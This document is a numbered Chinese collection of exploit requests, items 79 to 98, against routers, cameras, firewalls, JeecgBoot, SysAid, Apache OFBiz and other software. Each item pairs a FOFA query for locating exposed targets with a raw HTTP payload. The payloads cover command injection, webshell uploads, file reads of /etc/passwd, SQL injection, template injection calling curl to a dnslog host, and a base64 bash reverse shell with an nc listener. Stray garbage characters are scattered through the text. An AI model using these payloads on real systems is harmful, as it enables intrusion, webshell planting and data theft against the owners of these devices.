( `& I0 F' J9 \% U* m/ R6 U
" H& C/ L3 N# j+ P& m j/Applications/SkillDevelopAndEHS/! i6 J* a1 `4 Y/ }. s
------YsOxWxSvj1KyZow1PTsh98fdu6l--8 r) F5 b4 G3 Y4 w8 P+ U
/ E5 H0 b1 p, |+ s: i
6 K8 J. r: j4 d5 LGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
1 C) a, O) Z2 L6 O3 kHost: x.x.x.x4 _8 N* z$ [2 k- ?9 `
1 |4 s9 q. b4 Y! ^( E* K0 O& {
Y* T$ _. B% T7 }* O% c! l8 Y79. BYTEVALUE 百为流控路由器远程命令执行
& U" u% s: _" t5 LFOFA:BYTEVALUE 智能流控路由器" g1 N% i e- Q7 T+ }
GET /goform/webRead/open/?path=|id HTTP/1.1
+ _. E& ^ h4 x2 _Host:IP4 x4 J% h5 @2 x2 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 x0 Y w; f5 v4 H5 T3 t8 n ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ A6 }3 y7 O$ d- LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 p# W+ N$ T; v7 @# n! n# M' ^' lAccept-Encoding: gzip, deflate6 q6 c8 @+ j* [) W" L( Z
Connection: close, ?8 Z1 ]) o/ x, J) k8 ]
Upgrade-Insecure-Requests: 1) \) H" ] |/ R% M
0 \# o& D; V2 `" O. N
j5 O0 w/ X% R4 n
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
$ e, K6 B4 u% R2 `* pFOFA:app="速达软件-公司产品"
9 k2 C& H! f5 GPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
- G# O# M# \9 E. T& FHost: x.x.x.x+ A( j& Z0 K1 U# W0 n$ y7 @5 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& T) a# U# [% C0 w0 _5 R& _Content-Length: 27
8 L( ~* ]7 r. G* N/ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 f, Q) p: f& Q; OAccept-Encoding: gzip, deflate
# Z! x D* U3 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 j: i3 i8 T/ @$ l9 w7 V
Connection: close
* @% a& D9 c: B) U* X' TContent-Type: application/octet-stream
0 i1 N5 S: p6 y6 t! lUpgrade-Insecure-Requests: 15 G0 c- Y& _) w: ?. r1 M
4 R* g7 g% N+ s& h6 K, z
<% out.print("oessqeonylzaf");%>/ c" D' F& F/ J2 D4 M! J
o; v0 B7 W* W
2 F# h4 i6 Q& j! ]0 b* r K" UGET /xykqmfxpoas.jsp HTTP/1.1" z+ o; P! U( z/ y
Host: x.x.x.x
1 @- v* v0 P4 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! ~; A- X- q! D' E8 B- a
Connection: close
) T! l# P! H! y2 a U8 X' w* J- qAccept-Encoding: gzip6 q. n8 Y3 v4 v* R
8 }9 t% E% ?1 F, q- ~* K
3 [" c; x/ {" T% B$ J/ j& z/ M81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 l* f5 F5 \7 N$ T- B/ D
FOFA:app="uniview-视频监控"
% k4 }: U% g, _6 O, o& WGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1/ P' F* Q4 @$ p6 \' S
Host: x.x.x.x0 B, O6 c' ^, V+ u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ k4 Z1 b2 ^1 G5 m
Connection: close
K x% `1 g& MAccept-Encoding: gzip
: y& `5 y! D! v1 {: q
( }' Q# W0 }+ Y( ~* m9 Q' J$ C5 g
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
- y1 o# [! L2 N4 A8 C, Y! H* l! k# VFOFA:app="思福迪-LOGBASE"
0 P4 w. Q( R f6 @8 {1 QPOST /bhost/test_qrcode_b HTTP/1.1
5 h: z* z5 z& O; D* x% J1 e4 YHost: BaseURL
; |8 `2 E) o+ |, E: ]' {% oUser-Agent: Go-http-client/1.1
. \( N& d9 {! n+ m. ]+ i. n7 a/ [' GContent-Length: 23
' |% S, L; J7 C5 j" c }; [% ]: AAccept-Encoding: gzip* }2 q3 ]: {' A' x4 M% w
Connection: close2 e& A% T( g3 p; M5 P' a
Content-Type: application/x-www-form-urlencoded9 B# r. O5 ?* u
Referer: BaseURL6 P1 j. q+ p& S4 R3 H
5 L% F+ d$ `# g$ e" ?" `+ _
z1=1&z2="|id;"&z3=bhost
9 \! K) A5 ]* F ~, _0 M- P9 j+ H6 Z* r( h. f
, J* y& C; d7 V+ @/ K9 u! `! J
83. JeecgBoot testConnection 远程命令执行( g4 u7 p! c% `' ^& ^
FOFA:title=="JeecgBoot 企业级低代码平台"; W# B X+ ?% A+ p# q! `# o" ~
% ]' H4 c0 l2 a$ u" M& S' R- b3 j$ @5 X M
POST /jmreport/testConnection HTTP/1.1
% g1 I0 r8 e+ R( D$ {7 ~3 d4 SHost: x.x.x.x
" k3 i8 P+ D- m# o" O8 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: Y% }0 Z7 U7 hConnection: close! c9 w, @( b1 i2 X% t8 J
Content-Length: 8881: P0 I; j6 w$ ?) q) @, t& [1 S j
Accept-Encoding: gzip& S5 A6 r( W& ]. ]# k5 h9 g
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"# m6 O+ O9 p+ ]; c
Content-Type: application/json/ q$ N5 n' {" ?' G7 [ U/ P6 W
" d/ h2 K9 b+ _% i
PAYLOAD) W: L( y4 [+ J/ K* ~
9 k& N$ n( @ F; u h5 a
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入" s; z9 p2 B' Q0 H
FOFA:title=="JeecgBoot 企业级低代码平台"/ v& a# Y# j$ G- f5 [9 U5 `
# j7 @) @+ ^( M+ Y. m
5 D9 W9 L6 r, Q; R( t& y8 |4 Y5 x' [$ {$ S7 i
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
, J) |& ?/ H% S5 O! CHost: 192.168.40.130:8080, K/ y. B6 B3 ]* B. z; [& D
User-Agent: curl/7.88.1
( D% p; `: w0 ^Content-Length: 156+ z5 F$ s3 `" t- P/ @
Accept: */*
5 s4 g# ~9 P# M* @9 DConnection: close1 ?) d- [+ T; e3 y$ }. Z
Content-Type: application/json( K7 j& ~- _3 m$ c4 j0 F w
Accept-Encoding: gzip5 \/ J% K& g! ]; C& K S
t0 v& r0 O+ u( M. l{
, x6 z' M* \5 q+ u7 v* y5 s "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}", V4 h4 U1 z2 @' k5 t; e
"type": "0"2 ^: j/ T) N) g7 w1 n+ v! L
}0 e* m- c. H# c
- {( o1 z) V$ ]& _/ F
, [* u8 @6 u* o6 |1 ]9 p9 A5 [
85. SysAid On-premise< 23.3.36远程代码执行
' S) j& A6 u! i4 M8 d4 d; S3 R9 }CVE-2023-47246
) P9 o& j' z" [' x/ ?FOFA:body="sysaid-logo-dark-green.png" 3 ^- q% H7 w7 T& z: a9 Y9 y1 R' P
EXP数据包如下,注入哥斯拉马$ V& Y j9 Q1 y
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
% l4 \+ u( q" ^; ]4 y- C, `/ U- dHost: x.x.x.x l* x2 x$ H4 M3 g; H+ {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" B5 \$ N$ A$ {; z( w- r; o# Z
Content-Type: application/octet-stream% Y# s$ d1 ]3 t2 K
Accept-Encoding: gzip; j0 R! |& z# F7 K
7 ~- Q G& a6 |PAYLOAD+ E% q" {9 F) U2 k6 c
- v/ M+ e* o$ ^( a* B回显URL:http://x.x.x.x/userfiles/index.jsp
% C; J0 C1 s, N. D8 X7 P" c! r" A
' P" F9 Z/ M4 \$ x5 Z* y# m7 R) C86. 日本tosei自助洗衣机RCE0 F: q- \$ N* B% q4 a5 s$ m" b- v
FOFA:body="tosei_login_check.php"! }6 S& ~/ R' h. M
POST /cgi-bin/network_test.php HTTP/1.13 f. [% ~$ d1 Z5 o! f' E
Host: x.x.x.x& R; S' A+ n, H6 H% L, a! A H; K; V
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' Z# b+ K1 i$ _. t, r' `Connection: close8 j- f5 w; Q2 B) b/ H& X
Content-Length: 44' u8 b$ F& b" f/ C
Accept: */** V) g% a9 G5 U: ^( ]$ }: e7 z
Accept-Encoding: gzip
' B: E6 n7 l" a) HAccept-Language: en
: h- `+ e @9 b! J8 @Content-Type: application/x-www-form-urlencoded; G; W& u9 n( D3 D. d+ G8 Z! x
7 M F2 y$ A# y0 F3 C3 N" U( y
host=%0acat${IFS}/etc/passwd%0a&command=ping
! J& W# }9 c2 X8 p! V
# X9 i0 z+ N! r4 |+ Z, V* u1 p, z& V3 d! _- `" \
87. 安恒明御安全网关aaa_local_web_preview文件上传
7 d- g, Y1 Y: l7 V" p! w" @: k: @FOFA:title="明御安全网关"- E& Q% y8 J# v4 f8 u" |
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
/ M2 a" j9 Y7 S8 a6 aHost: X.X.X.X
/ L& F" D9 ~7 o6 N. a5 c* [* ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 e( }/ T- X# B6 [
Connection: close; _8 M6 `) z* _
Content-Length: 1989 _: c1 l9 ~2 c# c
Accept-Encoding: gzip2 @' ^, U$ [9 Q6 k0 ]/ \
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
, o& t! w; y' n$ ~7 U; V
/ s5 d3 c/ o8 a# F--qqobiandqgawlxodfiisporjwravxtvd# E, ^5 p" v8 M+ M7 p' o6 {
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"- T/ D3 K \* ~- t& N/ I0 q9 _
Content-Type: text/plain
6 \9 C, i8 j8 M1 ]1 K& I$ M/ L/ e$ i% ~ D' ?6 ^% S% |# L$ i
2ZqGNnsjzzU2GBBPyd8AIA7QlDq8 ~! j1 q: ~- d" a) t
--qqobiandqgawlxodfiisporjwravxtvd--; f% V/ `: f" P/ r2 ~
7 e( b9 m% U" K9 {0 b3 b6 o
# ]5 K, j) c0 L5 t) e/jfhatuwe.php
3 l1 S8 O5 d3 ~5 n+ u# O' H6 x0 K+ X* v& s2 z8 }
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 ^7 P/ z' Q2 X6 U, D9 W
FOFA:title="明御安全网关"
6 c! R6 K( R. m- s* o& p4 k4 o6 aGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
9 [; k2 X1 p3 K) V. lHost: x.x.x.xx.x.x.x/ L+ e9 s( y( u" ?; C: d8 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( \+ {$ H9 p2 e; I+ x& I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ r# X0 b# \% [2 @! J$ p$ ~2 n
Accept-Encoding: gzip, deflate0 V4 Z7 U; u7 D0 d; M1 u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! }+ |" u9 u9 n1 e9 S; `- e6 nConnection: close, h! t. L- x3 D1 |1 R, [. A8 q, a
: U: d8 S: q- g, m+ e6 w" }/ Q, q' w6 D2 i& v
/astdfkhl.php. ?9 d* K7 R" I( u
0 l' q, Z8 w3 U1 e89. 致远互联FE协作办公平台editflow_manager存在sql注入; S& o0 R) P. |/ o/ ?' @
FOFA:title="FE协作办公平台" || body="li_plugins_download"9 x. R# {6 L, o+ N$ d
POST /sysform/003/editflow_manager.js%70 HTTP/1.1$ s* B9 @6 J. b0 Z7 I
Host: x.x.x.x3 N1 A# d2 A) u. R2 D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ \" y q3 e# {$ G: @Connection: close* d" v' q8 ^7 s' p* Y9 S
Content-Length: 41* i4 |3 _ v9 |1 J
Content-Type: application/x-www-form-urlencoded
' z. k; C$ s5 }$ b% n) Z( pAccept-Encoding: gzip. V$ |+ S7 D+ s0 D- a, f' ^
& i- I6 q2 ~, f# p: a D- O) V( ^
option=2&GUID=-1'+union+select+111*222--+
q0 L7 W( i) ] \, l7 H6 V
( i' B2 u O% i9 I" u* o# v, R' G2 p2 F
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行( W+ I* r# c4 G/ ~* V. R7 @, X
FOFA:icon_hash="-1830859634"! `, G. O8 m% v
POST /php/ping.php HTTP/1.1" ^! U. j5 x/ {1 k+ C2 M2 H
Host: x.x.x.x# k) W. m/ h# K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' x/ o& _6 @( KContent-Length: 51; M9 X/ ?" z$ ~
Accept: application/json, text/javascript, */*; q=0.01
" j4 Y5 ?- e$ b! o: f0 X1 D* I: [Accept-Encoding: gzip, deflate% T/ I/ x- x" n) D; f! d* T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- U6 V0 q9 l4 a; |+ F) W: u% g
Connection: close6 B! w( H9 m/ E' t* C1 ^* W0 A. y
Content-Type: application/x-www-form-urlencoded/ ~/ a V a" y: M1 H3 H+ {- I
X-Requested-With: XMLHttpRequest) G* r3 p+ `) k: b8 i2 \& j
+ @" A8 U" ~4 \. Ajsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig, g4 ^) s) `5 ] C+ s! z
/ [9 G4 ^( W% y( L7 Q( J$ h+ |
, j, L6 H6 ^ z% x8 D91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
5 l$ W9 q) g/ ~0 Z% L6 B* U, \FOFA:title="综合安防管理平台"# |" G& U1 r' ?3 o2 a( Q
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
/ m9 R$ ^5 [8 O- x/ AHost: your-ip
4 Y* F3 e8 k' r! g$ m1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36+ w3 |! O0 F/ D' Y
Accept-Encoding: gzip, deflate$ _& J! W, }; n) r8 S6 n' H
Accept: */** c, v" l) }0 K' R5 z- G
Connection: keep-alive
( a8 k& A1 t: |' D# ]; @: H" E% M5 Z8 r( ~) k2 V( S. X
; k: f m/ t* N5 b0 [; [9 @6 x4 a& a6 A
) Z- w/ I, H! j0 M/ U D
92. 海康威视运行管理中心session命令执行
1 J, w7 }! x# o! zFastjson命令执行
8 x4 `% ]# h8 K8 khunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"& N5 N$ j) Z* X: o# u' {9 z
POST /center/api/session HTTP/1.1 g0 U0 z7 t8 v* y- V( I
Host:
$ [# x# D# ^' l% s& PAccept: application/json, text/plain, */*
" ^( F& F! e6 Q) j9 a9 L* nAccept-Encoding: gzip, deflate$ e: q8 p2 J4 h+ s4 k
X-Requested-With: XMLHttpRequest
" I5 o; v8 w" o8 R( EContent-Type: application/json;charset=UTF-8
b' Y* t$ c& ^X-Language-Type: zh_CN% u5 H6 D" T e! y; `( }
Testcmd: echo test
% ~% W7 ]6 `2 r8 E# x% iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36$ b3 |- Q6 K$ k: g0 E$ D8 ?
Accept-Language: zh-CN,zh;q=0.9
6 G4 J: j2 D- |: X9 BContent-Length: 57785 C6 @+ W5 X, d/ b: N
9 U/ n$ ^, t1 S7 d) K
PAYLOAD. U5 N: }" l9 l. a7 e/ F
8 O. b5 @) j( N* L* H z4 D2 P8 K3 ]; s- ]7 O
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
# `9 c* w" s1 J, x( e2 m2 [FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 M3 b/ x/ p1 j6 b! e! m+ U- U+ s( m
POST /?g=app_av_import_save HTTP/1.18 t' O9 v( v2 N# o1 h
Host: x.x.x.x0 k$ [7 ]5 J- D* U7 Z, b3 E2 M7 |0 U5 F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
: a( l2 {9 u& Q& {) b# rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: r' q; w/ x& K s* H/ D$ B
) f4 y; N6 b$ F) j------WebKitFormBoundarykcbkgdfx6 B" M5 I9 M$ s2 P: l; H
Content-Disposition: form-data; name="MAX_FILE_SIZE"! Z! M$ ]3 e2 D$ x/ {/ m: w
: W- s8 k$ m: n$ @: o) |! r100000009 F" ]$ ]; R* t! Q
------WebKitFormBoundarykcbkgdfx3 o" G; A+ J% _5 }8 L" v9 q
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"! T& _7 L) P' L8 x) m6 \
Content-Type: text/plain
O8 e5 l- }) W: n( ?, [) e M5 N- k* }6 S# j( c1 Y
wagletqrkwrddkthtulxsqrphulnknxa( ]7 f& W5 D! t g% M& D
------WebKitFormBoundarykcbkgdfx
4 m0 b, |6 C+ A J9 K+ F2 fContent-Disposition: form-data; name="submit_post"
: _: a; L& X3 R
0 }. E$ t# ^3 r7 o, Z$ Z qobj_app_upfile
( Q$ x _- P7 Z------WebKitFormBoundarykcbkgdfx6 m5 `: O/ S: I% l
Content-Disposition: form-data; name="__hash__"0 M! a Y+ H; M
/ I& p5 k$ d" }2 q
0b9d6b1ab7479ab69d9f71b05e0e9445' Q& U1 F6 J% M5 ]. ^4 q
------WebKitFormBoundarykcbkgdfx--
7 o T- ?! K0 T( X3 |
" M0 M6 w+ `, v% o; M& ]6 H- C) R: d
GET /attachements/xlskxknxa.txt HTTP/1.1
" C5 a* @+ g' O% ?6 H; zHost: xx.xx.xx.xx
0 ` K! \' j2 H2 ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" ]/ e- e8 D# g- q; Y
2 v1 e. F8 V7 K. A2 ^! q& D
5 [9 k6 i& P5 T2 L& O
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传+ H: H4 I+ Y1 V: m
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ W b/ i4 \% Z# W) EPOST /?g=obj_area_import_save HTTP/1.1
: o0 t/ Y& d& F. V& Z7 q4 S( bHost: x.x.x.x
! Q. {( F7 |; V: G+ E4 W: G1 lContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
6 `& [ |9 _ A3 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 X9 X) c8 e: u+ h# f/ _* W, _/ ^: R6 Q2 [1 [) T' j
------WebKitFormBoundarybqvzqvmt
: ?% B: D x/ V+ k5 E1 d/ m( M5 hContent-Disposition: form-data; name="MAX_FILE_SIZE"4 a# e* M8 r2 }" K& f4 F
$ ?8 z: ?( t0 b1 [. _+ e10000000
! x8 J* L) t" Z% Q Y------WebKitFormBoundarybqvzqvmt& x+ S4 J+ D- W3 e1 V( R
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"' X$ i G0 M8 p, A# @6 Q
Content-Type: text/plain
+ M Y; t+ Z0 x
# W. W1 A" \- R+ L+ x/ O5 zpxplitttsrjnyoafavcajwkvhxindhmu7 k8 q3 {% i$ z
------WebKitFormBoundarybqvzqvmt. C- c+ }% g, J
Content-Disposition: form-data; name="submit_post"
; ~8 k, v0 u- ~! D/ t
4 P1 N) T8 T) @* q5 H" ^obj_app_upfile
3 O& F8 F" \+ ]------WebKitFormBoundarybqvzqvmt
0 {' X6 ]( k9 ^/ @Content-Disposition: form-data; name="__hash__"2 U! R# ]! ]/ t) S: E
) u1 C' i4 Q, I7 o" ]* |
0b9d6b1ab7479ab69d9f71b05e0e9445
. C# W/ j0 u1 X1 c ~ ^------WebKitFormBoundarybqvzqvmt--' @: T3 Z' k5 x, L9 b; m1 N% k" f
q0 n# \; ]: F9 w o7 J. l, b# n7 i9 S. ?, p( G7 F
3 t8 h- @* b. ?% M6 D
GET /attachements/xlskxknxa.txt HTTP/1.1
; A, P# X+ e7 s) `, [Host: xx.xx.xx.xx" \2 r* }- | ?' y8 b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; U# d. y# t/ \2 c7 r
( G+ |+ P9 h. ?; B6 p; Y0 @
2 Z* J2 Z2 {- p: \3 ~8 Y
" z' m) w7 v8 |2 e5 \& d$ N95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" a- R. P' j- h* p, F' Z3 RCVE-2023-49070
7 A; |. J9 J; x) k7 n4 OFOFA:app="Apache_OFBiz"8 X5 \% d9 H p" n, `$ ?6 K& f8 U
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" z3 Y; T* n: ?8 l% n8 ~
Host: x.x.x.x- p0 h* X, ?$ q$ G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
; L, ]1 @8 b7 N$ P3 SConnection: close" E7 F2 W4 Z, [2 ~' q/ ~
Content-Length: 889
( o0 x# i- E; VContent-Type: application/xml
' A _0 j! z0 J lAccept-Encoding: gzip0 d, m- p% ? E5 Y! W0 _
2 ` l8 t% ~6 u& y/ Z
<?xml version="1.0"?>
; x( \7 r2 [* W# v<methodCall>* I5 n8 }8 j; p9 `# l
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
* N5 ^2 w/ Y7 O$ B1 p" @4 i% [ <params>. K9 O |" u9 c* Q7 K
<param>
+ u" p: A3 q( Q" v6 k9 G( l <value>
9 j8 y1 F3 B, |9 z0 t <struct>; Y2 w0 M v: f
<member>
7 J. K& L) g, Q <name>test</name>( ^' o7 ?) |$ Q) ]& P1 p6 ^ E
<value>
3 Q; s5 h/ r$ R: A. X <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
( B/ P z# Z$ i </value>
2 H) j# W ]8 G </member>& u9 f; h- Q4 w( t+ ]1 Y
</struct>1 R3 l5 _0 U$ M7 H4 q7 A
</value>
0 h7 @( I9 P! c0 h </param>: _5 g0 u% p" a2 `
</params>) m8 A9 C; Z7 _5 a9 D0 L
</methodCall>) o5 p) X8 q0 m; h1 b( W* P
$ j) m* y' ?9 ^! X$ F& V
( |( O2 _5 a* g T& f' M8 W
用ysoserial生成payload
% {9 i# {. K" L T4 Kjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"8 \5 s1 r* N* M
! m9 H( M1 \0 E; x% \
6 u+ R! y# @$ p; h n- Q3 M; v. I6 G" n: M将生成的payload替换到上面的POC
9 w+ R6 C ]. u, B" H3 ]4 k# [POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1( Y2 D& [9 a: `# I1 I# U! o* `
Host: 192.168.40.130:8443
8 ~6 _7 Q5 A. b( G6 ]5 C9 d3 XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, ~) U- w# g8 U7 ~2 L( eConnection: close! n. n: o6 T% h0 S( b8 S% F
Content-Length: 889
/ i$ Y3 U* S# ~- T& J2 e" bContent-Type: application/xml
' j- Y; ~% o; p+ A7 L# j8 g* OAccept-Encoding: gzip
/ E9 a% B8 p3 L& o) x" ~ A# c8 m3 N& l( ?
PAYLOAD
3 O* m8 g% I9 S* E- B* o% {4 v& | k9 c9 e0 C
96. Apache OFBiz 18.12.11 groovy 远程代码执行
0 B$ u5 \' v# J! X4 K3 o/ e* G8 _1 r. ]FOFA:app="Apache_OFBiz". w5 T# z- x% h* w% J1 ~
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1) E, P, ]- `! X* N Y
Host: localhost:8443) _- m5 W% W6 X) `2 G# X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* z1 K0 u* G5 ?# f1 T! AAccept: */*. y+ D; j) Q0 G! O* |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( p v. s$ e3 z+ n8 T2 H
Content-Type: application/x-www-form-urlencoded
) c; X: m e' f, Z! c+ ZContent-Length: 555 _0 O; z# U- m' W& E
: P: Q, r5 w# X1 DgroovyProgram=throw+new+Exception('id'.execute().text);6 o: E! M/ `* D9 Y- y* E* h* P
$ ?& X1 o, U- r5 z
$ c$ e1 P. E. E# j$ J& Z. q8 n反弹shell# P7 Q5 U; N# `# b' c
在kali上启动一个监听9 K9 z" Z4 z! s" ?# ]% p" P4 k
nc -lvp 77779 l& T O7 J+ ]/ \1 g. K
6 B* e1 R+ i- Y) d: h* @
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- |/ q" G1 T# Z: x, |8 D$ Z" LHost: 192.168.40.130:84431 [- N# k, w7 y& B6 T. g! @$ M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ w/ [3 N: C9 |5 \Accept: */*8 U7 m3 H4 C* b! Z; b+ a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 Z- R) H* B" K
Content-Type: application/x-www-form-urlencoded$ ], n) m+ L* @ ^/ S0 j& O
Content-Length: 71. k- o+ {, G3 o3 O5 O& {) G
3 u( I1 ]; q) h1 tgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
, k, J, Y0 O6 H5 L: B! I' I% c! n3 ^- Y% G# W& A
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行. w# @; c k1 L* B/ l
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
0 @' T+ o, `) F. [4 z" @# s9 ]GET /passport/login/ HTTP/1.1
' x0 ^( b# W$ L! t! J3 P2 VHost: 192.168.40.130:8085- a! [- Q% U+ H, I1 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& [6 e6 W( [' j* y
Accept-Encoding: gzip! V0 f, T8 H( q+ ?6 v: F, X# j
Connection: close
% L) Q& u4 G4 N/ ]Cookie: rememberMe=PAYLOAD
. z& C1 J2 ]+ a. [4 f2 FX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"! f& j1 z3 g5 |9 H2 [4 o. O9 f; r
2 w4 k( o, w+ Z b% F
( i: b5 b* Y9 K% D+ x* `6 }4 j98. SpiderFlow爬虫平台远程命令执行# E- ^: N2 t" l
CVE-2024-0195
; k+ d5 [* K0 y8 w9 RFOFA:app="SpiderFlow"1 {. M1 w0 k! G+ V+ f1 C# p
POST /function/save HTTP/1.1
; c- g$ m, s) R( _" AHost: 192.168.40.130:80889 }8 f$ }7 o$ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ F% c9 u3 L7 e2 u9 }
Connection: close
, p) j# |* a* X, U9 bContent-Length: 121
